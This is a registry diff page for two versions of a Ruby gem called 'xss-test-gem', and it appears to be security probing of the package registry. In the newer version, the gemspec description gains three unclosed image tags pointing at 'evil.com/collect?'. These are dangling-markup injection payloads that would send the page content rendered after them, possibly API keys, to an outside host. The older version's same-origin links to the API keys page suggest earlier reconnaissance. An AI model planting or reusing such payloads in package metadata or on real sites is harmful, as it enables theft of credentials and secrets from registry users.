xss-test-gem 0.1.7 → 0.1.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. checksums.yaml +2 -2
  2. metadata +6 -7
checksums.yaml CHANGED
@@ -1,4 +1,4 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: 4b71a480d264490b55de16274b30a4faca8cb93c8f99cce8d12ed3efff5266b5
4
- data.tar.gz: 3392eed1853c0f2d0927d297ed1e3f5cf888746d0de88e2a91f32156ea3c8147
3
+ metadata.gz: e15add40565e1b917c3e1cee50fc1301249d96f8e6f91f59c82636761eb7756f
4
+ data.tar.gz: 20e50172e8c6a99f6d5aa95dc4ed5fc6c459f20c7b17efeeb2e02d128d9fb32a
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: xss-test-gem
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.7
4
+ version: 0.1.9
5
5
  platform: ruby
6
6
  authors:
7
7
  - Testing Buffalo
@@ -9,14 +9,13 @@ email: testingbuffalo@apexblack.org
9
9
  homepage: https://rubygems.org/gems/xss-test-gem
10
10
  licenses:
11
11
  - MIT
12
- summary: Same-origin URL tests
12
+ summary: Dangling markup test
13
13
  description: |
14
- == Same-Origin URL Tests
14
+ == Dangling Markup Test
15
15
 
16
- Full same-origin URL: <a href="https://rubygems.org/profile/api_keys">API Keys</a>
17
- Relative URL: <a href="/profile/api_keys">API Keys Relative</a>
18
- Same-origin image: <img src="https://rubygems.org/favicon.ico">
19
- Absolute same-origin: <img src="https://rubygems.org/images/cross.png">
16
+ <img src="https://evil.com/collect?
17
+ <img src='https://evil.com/collect?
18
+ <img src=https://evil.com/collect?
20
19
 
21
20
  required_ruby_version: !ruby/object:Gem::Requirement
22
21
  requirements: